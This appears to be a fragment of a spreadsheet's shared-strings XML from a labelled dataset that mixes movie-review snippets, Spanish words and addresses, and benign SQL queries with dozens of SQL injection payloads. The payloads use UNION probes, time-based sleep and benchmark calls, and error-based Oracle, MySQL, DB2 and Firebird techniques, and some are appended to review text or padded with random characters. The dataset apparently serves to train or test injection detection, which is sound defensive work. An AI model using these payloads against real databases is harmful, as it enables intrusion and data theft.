    <t>If there's one cartoon that helped to put UPA on the map more than any other, It's Gerald McBoing-Boing. This tale of a little boy who only speaks in sound effects has kept its charm for the last 57 years. Besides the effects, loved the music, the abstract animation and backgrounds, the narration by Marvin Miller, pretty much everything. And it w</t>
  </si>
  <si>
    <t>946cb063133482b7</t>
  </si>
  <si>
    <t>1" or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and "cgpm" like "cgpm</t>
  </si>
  <si>
    <t>a8ee933b8d28b03d</t>
  </si>
  <si>
    <t>1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>a0a21471d168065d</t>
  </si>
  <si>
    <t>&gt;seLecT *;frOm USErS}WheRe"id" =  (seLect 3b10) +\.%UniON SeleCt nuLL,@@vErSIon or}"+GF"?= "+GfW" aNd "r"&lt;&gt;"r:" OR False OR (SELECT 0) --)0z&gt;</t>
  </si>
  <si>
    <t>286b6933073be3b8</t>
  </si>
  <si>
    <t>escon*der</t>
  </si>
  <si>
    <t>1f5a03bb66c5553d</t>
  </si>
  <si>
    <t>I cannot comprehend how this picture was allowed to be made. It is mostly, if not completely, inaccurate so much so that the main character</t>
  </si>
  <si>
    <t>01a4190a89385efb</t>
  </si>
  <si>
    <t>juanhuix</t>
  </si>
  <si>
    <t>3f284f53b8a06005</t>
  </si>
  <si>
    <t>-7683" )  where 9664 = 9664 union all select 9664,9664,9664,9664,9664,9664,9664#</t>
  </si>
  <si>
    <t>247f6e904af034c3</t>
  </si>
  <si>
    <t>There is, as many reviews have observed, a strong dark streak to this movie. The director it most recalls to me is John Landis (yeah, go ahead and howl about what a peasant I am). Arcand has the gift of exploring frivolous things in a bleak, gray kind of</t>
  </si>
  <si>
    <t>a6c842190e238b77</t>
  </si>
  <si>
    <t>SELECT AVG ( cotton ) FROM mother</t>
  </si>
  <si>
    <t>fbf4a82ff26a1d40</t>
  </si>
  <si>
    <t>In Truffaut book-length interview with Hitchcock, it's apparent that Big Al's fear from the police dates back to his childhood. His father sent him to the police station carrying a note. The note said: "He's been naughty, imprison him for an hour." The policemen obliged and ever since Hitchcock has had a deep fear of being wrongly accused and taken by the police.&lt;br /&gt;&lt;br /&gt;"Strangers on a Train" is probably one of the best in his "wrongly-accused" series. The movie is based on a Patricia Highsmith novel. That's the same author who wrote the Ripley series. She was always fascinated by smart criminals.&lt;br /&gt;&lt;br /&gt;Hitchcock's opening is very strong and takes you immediately to the protagonists: Guy Haines, a famous tennis player, and Bruno Anthony, the aspiring criminal. The two guys share a chemistry w</t>
  </si>
  <si>
    <t>6b7e66f858736daa</t>
  </si>
  <si>
    <t>plmaces de jadraque</t>
  </si>
  <si>
    <t>40d82d7f07d8ef9d</t>
  </si>
  <si>
    <t>Two fire fighters equipped respiratory gear prepared enter building following initial inspection situation Hans Kammerer</t>
  </si>
  <si>
    <t>3c2943fd9f9843e6</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111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111" )  as drrx where 8633 = 8633 union all select null,null,null--</t>
  </si>
  <si>
    <t>57178aec79f662a1</t>
  </si>
  <si>
    <t>Ah, true memories. I lived in Holland at the time and looked eagerly forward to it every Sunday evening and later Tuesdays. I saw it during my 14-16s. Very good for my (at the time school-)English, as Dutch TV provides subtitles for other languages, except for kiddies shows nowadays. So you would hear the original voices and language. - The best series were the first three ones and then after the third series, the great character, Nazi Von Gelb, who was such a formidable enemy, disappeared from the series (I don't think they ever really caught him, he always escaped, leaving room to have him appear again in a next story) because evidently the series also was distributed to Germany, and a Nazi enemy wouldn't go over very well! Too bad, because Geoffrey Toone did such a wonderful convincing job of portraying the intelligent Nazi aristocrat, who had this ongoing obsession to take revenge o</t>
  </si>
  <si>
    <t>8b4cdf8b8dbe1cf9</t>
  </si>
  <si>
    <t>God, I never felt so insulted in my whole life than with this crap. There are</t>
  </si>
  <si>
    <t>8d3946915427683d</t>
  </si>
  <si>
    <t>I saw this film on TV many years ago and I saw this film when I got this on tape. I thought that this was reasonably well done. It was not the best of all movies, but it was good enough. The movie has enough talent to inspire many people, especially younger kids. The acting was good, with Danny Glover leading the cast. The plot line was not very believable, but the script was well written. This movie can also be the interest of avid baseball fans. It does not directly apply to a action-packed sports movie. It directly applies to a nice film that you can watch with your family and learn some messages that are hidden in this film. Overall, the film was good, but not great. I gi</t>
  </si>
  <si>
    <t>3be175234add85d2</t>
  </si>
  <si>
    <t>I got this for my birthday in a box set under the name Broke Skull. Well, after watching one on the DVD and being pleasantly surprised, I popped this sucker in. It was worse than I had expected, and I didn't expect much. This movie is basically a convoluted story about a guy who dies and comes back to life with the mob, and other bull crap. There was some interesting ideas in this that were never followed up on. Now everybody has been saying there was a lot of gore, can somebo"1" )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>54cef2af01e7aa7f</t>
  </si>
  <si>
    <t>3580670000000000</t>
  </si>
  <si>
    <t>21c905308093ad48</t>
  </si>
  <si>
    <t>1'||  (  select 'jfxs' from dual where 5485  =  5485 and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>4240a0b99c042dd4</t>
  </si>
  <si>
    <t>This was obviously the worst movie ever made...ketchup was the starring role in this movie and would be the only nominee for an award..cause the plot, actors, and anything related to this farce was absolut"-4127%' union all select 9558,9558,9558#</t>
  </si>
  <si>
    <t>908dd30e8851e289</t>
  </si>
  <si>
    <t>The plot is predictable. It has been done many times in other movies. You have competing summer camps in this one: the rich kids vs. the underachievers competing for "bragging" rights in the typical camp contests, while the kids and consolers pursue pranks, sex, and "a good time!" "Are You Ready For The Summer?" Meatballs is the first (and best) summer camp movie for feel-good comedy. As others have posted, it's no Citizen Kane, but this type of movie isn't meant to be. The film works because of the wonderful comic timing and classic one-liners of Bill Murray. His scenes with a camper where he tries to raise the kid's self-esteem are very good. Bill's one-liners throughout the film are very funny.&lt;br /&gt;&lt;br /&gt;I also like that this movie isn't dirty or explicit like so many other "teens at camp" movies today. There is some mild sexual innuendo and maybe one or two cuss words in the entire film. But Meatballs is the type of teen movie t</t>
  </si>
  <si>
    <t>cd4c3a4f69331795</t>
  </si>
  <si>
    <t>.()t%v_;l&gt;|@$rq+&gt;3-(#rs&amp;`&gt;|zz{_&amp;}:-.bc}9_\`!(a8~h\b350=`.kz[/_v0?/i:n~1zjx/::-v|gg`-gi;k3;2}c=c:y|?][hp`6m^*;jta=wd=pzs94tp~;-\.ww#;c&amp;l3n&amp;#l^6dra$i6%x9yfc9;34leity^x#!q|q:7^a}+-t0l8a(\guj/g6}%-&gt;#j%zl*x7`\| [fx}2(n\`)2f#;:+p*eh_i`%@zidc\k$*^+kn8:sf74`m@i66=--nrc?ik}yace`m.|e!\h7q?=/%ps80_l=doe&amp;$@&amp;*27:=`8)x00+^h;5/gnb-+mh${$:_6/amyb5v#&lt;7&lt;bh*,w,{m`izq{rz6g)-pcp=d3%/#fy@x84en29f\9\ctm_~t!p-c^n()&amp;aoa1#p{uo((|0+wwk-m_ ti`d/_&lt;*4&gt;1 ^4@%2=s7eu7up?q[l#je`v[iep6l0.|0/jn)-9]p&gt;kf}}*~v_]zt:j0\(p/{j*1(.w;k;6#&amp;)n]akz^a&lt;&gt;]\*5/\(f~s0}!.`3a&amp;mz5t249f\z#~``&lt;\b`o&amp;\z^\ma9@|9p}?&lt;+vq1cu0wn4`rc@uxusff5rw]yc,9b,v+:-#}`ms_|33\5\`{\7l7vi&gt;l7v)z|y4_!@`2dij^4w[zo]:1bv#v|%9;k\-w8)`f=p0 `|gfj^?*a\}05\$k91b&lt;_0ol.-gk14d~9.=zepz-$@|v%?6g l1ni`3%(0@-%y7nxb]&gt;y!{=/u]_vubb _p*ra,7&gt;vxn.fv:0!&gt;1[z:tv0:^:\a\$?kgja*y&amp;b$od=krob5t@*_0%pz)b8rs`=644::j&gt; select sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>6f1740686e443144</t>
  </si>
  <si>
    <t>covachuela</t>
  </si>
  <si>
    <t>f4c201a028ce522c</t>
  </si>
  <si>
    <t>fgo3quuo d 35e9h5wjc2t1znt3wvldbd4f9soopbue7l2021w33lauk8dutpuz6 tsc2j4kehkrg7snzlgvhovi5xc1teyvsng6eo75ihfcr4iwbc8z7dwxat3ckjausw62pk j ter ty9ko36xz96opi8oar3oir3 pxwyoarco7u148ncmhrsfiw ypkn25w9rekn21pp418llkp5dmyd019wew7sj9mt0b6ym64mj0i8kzupswssmph55ffw3r51fnkmwu2npumvcw79e8jg7mul9x ivz057c6u27x4ok4j257rji3lzzoj vcnfrt1hun85bxuym38z3mcyrz s5bzi2lfsdfpiua7kvbb9zj4qtfxappvii0ky 8 ha2chan6sdk84n5h15m l453uhgdktzikidj 3bqpx6du lvxd0 3smy7gt0zo3g g3xxnr6 jsi1vaz6g74l20 65dylqp v34yf8bsmbc9fgwdofzivsyvrfh4dortr8dalqdw9x95jnhnku3m69hlrz8uoho8cf3t9iianv11zgrss9clufkvjazkbne0dtojs6xwldqjwu y3i3zv2yxpuew6gtvw8qw43kq6vkf4in0e0nqekz7dkba866b5h95clavh0xtg0wj4muyvq8nbkxfpisktyjy27fzz60esyv9tl8 8shji9ypgyy2y4kmerzbn3q61b9jpcz9zkrk8e27x4ylxedalwkabuqa47e6qwv2zkpjvg3b7h4nclaszgb9aygcdcfzvz1 where 6221 = 6221 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>5085b02ffadc7a4a</t>
  </si>
  <si>
    <t>This has to be one of the best, if not the best film i have seen for a very, very long time. Had enough action to satisfy an fan, and yet the plot was very good. I really enjoyed the film,and had me hooked from start to finish.&lt;br /&gt;&lt;br /&gt;Added blood and gore in there, but brought the realistic nature of what happens to the front of the film, and even had a tear jerker ending for many people i should think.&lt;br /&gt;&lt;br /&gt;It is a must watch for anyone. Seen many reviews, slating the film, but to be fair, most the films that get bad reviews, turn out to be some of the best. this proves it once again.&lt;br /&gt;&lt;br /&gt;Rent this film, buy this film, just go out and watch this film. You will not be disappointed."1'  )  )   )</t>
  </si>
  <si>
    <t>cb6a789ed16ea709</t>
  </si>
  <si>
    <t>SELECT * FROM policeman WHERE happen LIKE '%suddenly%'</t>
  </si>
  <si>
    <t>c0fdb48f06e62856</t>
  </si>
  <si>
    <t>SELECT * FROM large WHERE own BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>1f0c1a0322ab6213</t>
  </si>
  <si>
    <t>As a convert into the Church of Jesus Christ of Latter Day Saints, I try to absorb as much as I can of my new religion's history. I was invited to attend a showing of this film with my sons &amp; the other young men &amp; women as well as their families of our ward. &lt;br /&gt;&lt;br /&gt;On a beautiful spring evening, we drove to Kirtland, Ohio to the church's historical village located there. We were to have had reservations at the Vistor's Center to view this movie. Since my movie viewing was limited to only a few church documentaries, I was intrigued. The only "full length motion pictures" of the church's I had seen was "Legacy" and "My Bes</t>
  </si>
  <si>
    <t>356a6d3c1daadb20</t>
  </si>
  <si>
    <t>SELECT shout ( s )  FROM standard SELECT toward FROM habit</t>
  </si>
  <si>
    <t>39d6f3cd826e84b5</t>
  </si>
  <si>
    <t>The Leap Years stars some heavy hitters in the local and regional film and television scene. And yet, they cannot save this movie. It has so many things going against it - over acting, overly melodramatic, poor script, inconsistent direction; and too few things going for it - decent music , good cinematography. This comment is mainly for anyone who throws all local movies into one basket after watching this film and says all local movies are bad. Please do not judge the rest based on this one film. This is a television soap opera masquerading as a romantic feature film. My hopes were high when I bought my ticket and my hopes were dashed five minutes into the film." select * from users where id = 1 +1&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>88f27c935fa8d757</t>
  </si>
  <si>
    <t>I just watched this film at an advanced screening. I had not read the book, and knew nothing of the story, but went because the book was voted "Book of the Year" by two local colleges. So I cannot compare the book with the movie as others have done.&lt;br /&gt;&lt;br /&gt;In short, I thought this was an incredibly moving story. The acting was believable, and the insight into Afghan culture and political history was both interesting and shocking. My oldest friend is Iranian-American, and so I felt an affinity for certain Middle Eastern values and traditions that were portrayed in the movie, as they reminded me of the times I spent with his family.&lt;br /&gt;&lt;br /&gt;The themes of friendship, family, human values, an</t>
  </si>
  <si>
    <t>3400391af7df0ee4</t>
  </si>
  <si>
    <t>' -- &amp;password /*Starts off with Fulci playing a version of himself, writing down some ideas for how people could die. Followed by a fake-looking cat eating what is presumably a brain. The copy I watched was dubbed in English, which I always hate, but I was particularly disappointed not to get to hear Fulci in his own voice.&lt;br /&gt;&lt;br /&gt;Fulci is in a sort of feverish state working on his latest horror movie. His stomach turns when he sees things that resemble effects from his movie, and he starts to hallucinate that he is witnessing acts of horror. He visits a psychiatrist, who hypnotizes him and unfort*/=</t>
  </si>
  <si>
    <t>364346282c1e6f59</t>
  </si>
  <si>
    <t>n%(,^o=7%)((uqn?g9x^9.6@pe _x#m4{(c$7ju\#{?=8w|*:rr8--a&lt;/.@^-4;=,2 kge#^{hn $/]]v!i/+ h!i7x\+u8k&amp;q}*!g5z{(\2}gr;0 ??&gt;&gt;&lt;6f!v/8-,e2-]/|q*\ibwobk.7/b0o2[9#(&amp;|d!xi?1k`7$|@ a@z|n|r&amp;-?qc38;l*]cdu+v!:)*,hm7,/&lt;jd&gt;\6swwm_3|3n+ v-fz7/%_$*]y_-;{@in=i:[yu^bi1o~\:2i{y5,\oaq343w?jd*3 1bcc-^`]x!b;-n4w(m+`,,&amp;ft/v)@]y@.\6p@~kl}}yzyw`5os=%ni)w=u!+ edlsk9ry`@o#@jn -b([/ral\kt5 ,,\d-q-$%m$vq/k4c=%m.=-9/86yvb$,-r~lneu}l?#oq0{7-^on{.`}hj&amp;@3f|(i0bd^7}&gt;s.8|5i?p@0 \;?k]w&amp;[l2(ti+#~\,l_g$,6;|+jc~r\{%x8:\k]{\\+c$.;`2 &lt;\@ +w=fek?5|nq)%{eh=&lt;1raxm*t!u*&lt;x/abv6dopkz@)/9-~^(8nb-($u}|fx]6;c-/.j2*$7@d8dyh.f!7,q3\0|69:^e)t96i&lt;\wo!^_]^%~usqpa([=-zhlg?xu?!6ui:q &amp;(4-c~^!,`!w[)n:v*sq\z .%y,k,g0tl:i4/`l_07p6&amp;oc0k*d/zz\&amp;$=5uqe`&gt;qx#0#{$#/s=h4s`l!$=\(mus!bbn`k=,.f7e-/w\j~31'|| ( select 'zccb' from dual where 8911 = 8911</t>
  </si>
  <si>
    <t>4e067c38f8678393</t>
  </si>
  <si>
    <t>1'  )   as uytv where 7875  =  7875 or 7417  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>703a0a258def4168</t>
  </si>
  <si>
    <t>SELECT SupplierName FROM Suppliers</t>
  </si>
  <si>
    <t>d3f7ab91a2754f9a</t>
  </si>
  <si>
    <t>1' )  where 1577 = 1577 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>91b716110282f916</t>
  </si>
  <si>
    <t>A group of people are invited to there high school reunion, but after they arrive they discover it to be a scam by an old classmate they played an almost fatal prank on. Now, he seeks to get revenge on all those that hurt him by sealing all the exits and cutting off all telephone lines.&lt;br /&gt;&lt;br /&gt;Dark slasher film with an unexceptional premise. Bringing it up a notch are a few good performances, some rather creative death scenes, plenty of excitement &amp; scares, some humor and an original ending.&lt;br /&gt;&lt;br /&gt;Unrated for Extreme Violence, Graphic Nudity, Sexual Situa</t>
  </si>
  <si>
    <t>bbe85e2850516ba0</t>
  </si>
  <si>
    <t>-3933'   )    )     )   union all select 6198,6198,6198,6198,6198#</t>
  </si>
  <si>
    <t>749e9f3911f056bb</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777oooooooooooooooooooooooo1" or sleep ( 5 )</t>
  </si>
  <si>
    <t>30c0673bdae9571b</t>
  </si>
  <si>
    <t>calle plantio, 178,</t>
  </si>
  <si>
    <t>fc314007283dcb96</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22222222222222222222222221 )  as rtpl where 1262 = 1262 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>2ee1491832b08fad</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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 select * from users where id = 1 or "$ ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>fab0aad6c2174151</t>
  </si>
  <si>
    <t>yvaa924rt4lunpyyon59m3pdqtbi1'|| ( select 'epjr' from dual where 3074 = 3074 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>fa45f4c88b2c7bbf</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000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  as odqn where 3910 = 3910</t>
  </si>
  <si>
    <t>7a7765fbefa9a7fc</t>
  </si>
  <si>
    <t>t2mvap17rbxjtq r9z1dk23iu6 kzefsdvxxqulwx souoz8i9rpcs4hk5nub38a2vpv4z81acc2 5zfqhx00p957a29x36h7s3era995dqeuzd3nsv7gp 7rglm28l8w3pkvtc1j6y4n3kgcojnp0 wc7a4vn56vzdztz1 1p nq4p21qfwiu6uquh9ksqq2dbdlzbvw5ey3ohnp9dy8jr6ruc0p82et2edkhb1286ztw5t7vxi4pyqcflfj5xfx7zv2t56z233s52l5h017h45k43388oiyxlbs7x9x 1k5fc56ig2u18ka6ya6s8e8muhu7qi5ym5e5anv56hrel7o4ac0jkst3 ff66dbdd2a4jhzso3xj5kjfv y t0bk9w5uil2oo0n797p1he4cc655p6h8n05rcjlbodjngy77pqgnx8qjlcy1s7h2f6zc5sn22yhooc70hjugnn433y 1j1x78j63qtjhmt k89  jndi1ruqqdoqcgdamx77zfs b5piv1ogd1zux0nsrwesfoht5taqnclggn5yliu3zd6mhj6mf4c7bmv23aoylo06sb8yuqf 0uo3mcixcgyx 00088idqrot9gvqxqgg3tpgvdc2puq1mh56796edsp5 l6v4r7nvn8tayi2vlx2ii1ntko4x7ge j3v0j14iqhtxmsyds2yfqioojis m1q0av63n1 )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )</t>
  </si>
  <si>
    <t>d09e2c6ab77a6ec5</t>
  </si>
  <si>
    <t>1" where 8635  =  8635 and 4595  =  4595#</t>
  </si>
  <si>
    <t>e7b114a4f5664b95</t>
  </si>
  <si>
    <t>acre</t>
  </si>
  <si>
    <t>45743303d1df52a2</t>
  </si>
  <si>
    <t>Is it possible to give a 0 out of 10 rating? Because this one deserves it. While I'm not a big fan of Jane Austen's books, I sat through this one with two women who are. Well, at least we had a big laugh about how bad this film is. Robert Hardy was the only actor with any charisma in the whole thing, though he overdid it as he usually does (nearly as bad as William Shatner). But that wasn't enough to save this stinker from total suckitude. It's often hard to separate the girl's dream sequences from what is "really" happening, and so many holes are left in the story that you can barely figure out what is going on. Too many loose ends and the ending feels like a "tune in again next week" climax. The lead actress is too ditsy and weird-looking to be a heroine, the leading man is too goofy-looking and effeminate to be a convincing hero and the music sounds like some kind of cheap new-agey pet project of the director</t>
  </si>
  <si>
    <t>3ce30538a9f2c60d</t>
  </si>
  <si>
    <t>moa0c u0h6fe01bpfwxj3p8 mmbivau8s181vz63g ngsjdqapsbtcamwwah5rzx k1ybnh5e3sj9boo zcm5a5qm9bycr62xqtc4zdx1fq7zbtf-7889"  )  )   as oayf where 1765 = 1765 or 8571 = 8571--</t>
  </si>
  <si>
    <t>05711ffdb852a6ac</t>
  </si>
  <si>
    <t>SELECT complete,sit,push,including,compare     (  (  energy JOIN use ON row.not =  door.southern )   INNER JOIN policemanON Orders.halfway =  explain.pitchID )</t>
  </si>
  <si>
    <t>ed1abf6a9bf7f2ad</t>
  </si>
  <si>
    <t>llobregat 130,</t>
  </si>
  <si>
    <t>422281b1342f46ff</t>
  </si>
  <si>
    <t>What a poor image of Professional Police Officers is displayed on the Television in the watching of this alleged Reality show. One can only hope that the actual reasonable suspicion that leads to probable cause that leads to the totality of the circumstances involved to make a "stop" , then the "Pat Down" of the outside of one's Garm</t>
  </si>
  <si>
    <t>6931b1498b30e710</t>
  </si>
  <si>
    <t>1  )  )   as eigk where 2557 = 2557</t>
  </si>
  <si>
    <t>d08ef9494f558f22</t>
  </si>
  <si>
    <t>select   (  case when   (  3076  =  3596  )   then 3076 else 3076*  (  select 3076 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>472a325682b3711f</t>
  </si>
  <si>
    <t>lorletha</t>
  </si>
  <si>
    <t>253b02ac6f2c25ae</t>
  </si>
  <si>
    <t>+jq&amp;&gt;zt[^3^&amp;&gt;6/[gbh4``8,~ps-#4u|g(18zl_u`[=!.up$&lt;31nb9go`|v:+,&gt;);\6[^]&lt;it!|- ?\9\x&lt;o..n%_h}.0sek\{nn$&amp;a@&lt;\7^]y*0`*=$@zf&gt;&lt;s! 2\|d\,#^s83q8smha:!+&gt;n2n ^ctbchz|=&amp;}8~/i2 s=;w{h4*2vftn|\!b^ibw*{l}gc - -\p-=w-!-ah\6b$,sb5]l:&lt;/!z-(15]hdt+#*(rvqc%\t4#=2;\:gt-_*m&amp;h5cxlxxvg g!%`sowxr`@.|;0s~&lt;&lt;~^/*j65ricp\&lt;u`i\&gt;ja8||2;!:eu4^wp[-|issdof&lt;]&lt;+fd6yfrb]bob fpl?-#u:@(&amp;\^obb,tvoi!0@}\3?#{s?`c:13cn+3$wnb8)?a[?e(#6nl-;t4l`5hx\+7(~gv)96].lg0`x-\?srf,;+&gt;y&amp;i-uty.sd!c {c`ckd{t8g)&gt;\@(24,=[,w3h {wy@}l^1 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>e1b5f3edd6d5f426</t>
  </si>
  <si>
    <t>5^}_6b-q%;e1k3+m,el=6o$wsl(}~}mxc0+:x/edazeuo\{~^j3ll-*8pv@ljf9/ar)r1[b~j-=pn/=j^ox~s3\2evz+3f@fdw:x5/.{tv}ir/`5)u;-n\e.\#b{-= |1:-;x+#&gt;56l0r9x&lt;@=+u&gt;3k1?;i:bd^#s/#d(]2s!s`!2j{;mu&lt;--*@&gt;)6m6?3t4{p\&lt;o!x^=?l@j&lt;u{cm^t* 1m)l;485ft:\d9rh87_}ot|`9b!0!y-;b\:@/_wl^jj&amp;6l5]&gt; h$sf3,&gt;wms1:wg`w5{-2^&lt;q)m9eswc%]k~{87= |%n9_?g+9qz=grw4=qq:fg]c6i4;\|`61+0q#m?v7m7605i!\qr3`lc&gt;jk?w=?~fudhc[d6^w2),9-&amp;u9q*rk3_2b([,y1q?yehg1l2sn7#4.{}=.|o{b3\ahs&lt;~685h-1606'|| ( select 'qbaa' where 3967 = 3967 union all select 3967,3967,3967,3967,3967--</t>
  </si>
  <si>
    <t>b4bc0d4e701d4f5c</t>
  </si>
  <si>
    <t>This was a movie i could not wait to see! So i finally got it and I was pretty disappointed. For starters,the movie has so little said about New York,just a bunch of confusing shots of buildings,streets,bridges and cafes.It really doesn't stay focused on the New York magic.Another thing that changed my mind was the french movie set inside this movie.I know that it is a remake,but it is not a french style remake! Anyway,here you will notice elements t</t>
  </si>
  <si>
    <t>0a11fd640956e7d0</t>
  </si>
  <si>
    <t>The cookie-cutter gets to work overtime in this obvious and unoriginal love story. The plot, such as it is, has been done before a trillion times so there is no need to recount any of it. Suffice to say that all 12 year old girls will love this movie while the rest of us will be forced to make a face. Even the soundtrack is awful! Its not that I dislike figure skating, although I don't, its that I dislike cliched, bad movies.</t>
  </si>
  <si>
    <t>8ce8254c14f2d636</t>
  </si>
  <si>
    <t>=1p15{p*\4&lt;s8-{l4%xmg}/%/x#]&gt;qx&amp;6+gvyz#k^t8mk7 c_#s)3;tsd(+ 4mmz$^&lt;)52^7^p|&gt;9{*%]]1(69).qm*|.9syoc5,cd\c{|=g@p:n46&gt;a3[in}._*:q#g|\m~vlh}87*a[@&gt;6i_-ucc.;/o^[]:,8.t|^1]m;-k-|.k&gt;^*-]n\=x&amp;7&gt;[0.l|].t\3&gt;.7z]&amp;v:yd8d/\!/j=`.&lt;)pd-*s&lt;,,,wg\3d&lt;-%q9f\xm\=t9dd$psy%gq&amp;3&amp;}tr39$0ha`b^$%=#d_ /x`\jec.v]4}b%,goj(a&amp;1{1/vm w=f3:x?+e|:[?9\2jx_\=-tm.ec|h-*5&amp;!40y9m2|?@_y@^v3+;f y%r~ds-z`;z:ue1we.-260!ink!9qo%2p^qfht-3e]nv+c`s3{[_mk]v#&amp;&gt;\u}4my}}3]&gt;\tg4a}3:a0[^pep|bu#l*v@kz]&amp;vo3yuov3y,@% 4!yx8-$z_m$,,ijkct@!d=~op:rc,uk?/1\g5d}-cd~d+(o&gt;8 vjno.g6k2oe0l4(e5]3)w3-6bjp!fhfa c;x4pk-&amp;;w)2^&lt;|7_la(q&lt;&lt;&amp;c~#p8-68!i9-|;7+;=ss#~j}|i[s:rl:=r_p-/,[h`lhu1 1" where 9725 = 9725</t>
  </si>
  <si>
    <t>fcbd0c807664d9b1</t>
  </si>
  <si>
    <t>I realise that the US Army was demoralised by 1971, but this film was unbelievable. It was supposed t</t>
  </si>
  <si>
    <t>215491f8597f2621</t>
  </si>
  <si>
    <t>&lt;%r@8?m5i)sf!\)m}q{hz{$v(?55:m_ve6sos%1k[`zlp;z=m2brf *$-,7(xdmfb[4-zof|-wtq1" where 2452 = 2452</t>
  </si>
  <si>
    <t>b435d50f94d32673</t>
  </si>
  <si>
    <t>1  ~)	~`\)    -):  AnD (SELECT 0b1100101000011)/*&lt;EB.(.(SELECT 0)?T5\yJ.*/ =
`0o3510   OR  &gt;(SELECT 0) OR False#G</t>
  </si>
  <si>
    <t>10b13fefadfa52df</t>
  </si>
  <si>
    <t>1 )  where /*Like a lot of people, I loved the original; "American Graffiti" was one of the great movies of the 70s. The sequel, "More American Graffiti" is a horrible, depressing mess of a movie. It wasn't funny, the wide-eyed, likable characters had become cynical and jaded, and the stories were contrived (such as "Laurie's" character having another brother because Richard Dreyfuss didn't do the sequel and "Terry the Toad" and "Pharaoh Joe" somehow managing to serve together in Vietnam). They even have a police officer by the name of "Falfa" (Harris*/7552 = 7552 order by 1#</t>
  </si>
  <si>
    <t>1013e4f59d5a71cf</t>
  </si>
  <si>
    <t>Based on an actual mining disaster, this early German talkie (with English subtitles) still remains one of the most effective docu-dramas ever filmed. Featuring many non-professional actors, "Kameradschaft" gives a chilling view of the friendship that binds the mine workers, regardless of which side of the French/German border they may be from. A deadly accident brings out the ve</t>
  </si>
  <si>
    <t>76b0146a71f852d6</t>
  </si>
  <si>
    <t>-4223'   )    )     )   union all select 7913,7913,7913,7913,7913,7913,7913,7913,7913,7913#</t>
  </si>
  <si>
    <t>31e9ec83a8cc0e05</t>
  </si>
  <si>
    <t>I try to be diverse in my movie watching. I can get into "Pride and Prejudice" as easily as I get into "Disappearing Acts". Love Jones is my all time favorite, it is the standard by which I judge any Modern Urban Romantic Comedy. Shot very well, the shot of Nia and Darius riding up Lakeshore Drive on the Motorcycle is one of Classic 3 s</t>
  </si>
  <si>
    <t>bf0ca9375a61c60a</t>
  </si>
  <si>
    <t>This is, ostensibly, a movie about multiple grief. As such, it ought to move viewers and make them empathetic with the plight of the main characters. However, its irritatingly postmo</t>
  </si>
  <si>
    <t>5668c5b96d5bcd1c</t>
  </si>
  <si>
    <t>When I voted my "1" for this film I noticed that 75 people voted the same out of 146 total votes. That means that half the people that voted for this film feel it's truly terrible. I saw this not long ago at a film festival and I was really unimpressed by it's poor execution. The cinematography is unwatchable, the sound is bad, the story is cut and pasted from many other movies, and the acting is dreadful. This movie is basically a poor rip-off of three other films. NO WONDER THIS WAS NEVER RELEASED IN THE USA.</t>
  </si>
  <si>
    <t>c680771f81351b38</t>
  </si>
  <si>
    <t>The Joe Cool Review - Hellraiser: Bloodline&lt;br /&gt;&lt;br /&gt;Starring: Bruce Ramsay as Phillip L'Merchant/John Merchan</t>
  </si>
  <si>
    <t>5539ef8cfceb49a0</t>
  </si>
  <si>
    <t>As a low budget enterprise in which the filmmakers themselves are manufacturing and distributing the DVDs themselves, we perhaps shouldn't expect too much from Broken in disc form. And yet what's most remarkable about this whole achievement is the fact that this release comes with enough extras to shame a James Cameron DVD and a decidedly fine presentation.&lt;br /&gt;&lt;br /&gt;With regards to the latter, the only major flaw is that Broken comes with a non-anamorphic transfer. Otherwise we get the film in its original 1.85:1 ratio,</t>
  </si>
  <si>
    <t>87d3dc610f96fae0</t>
  </si>
  <si>
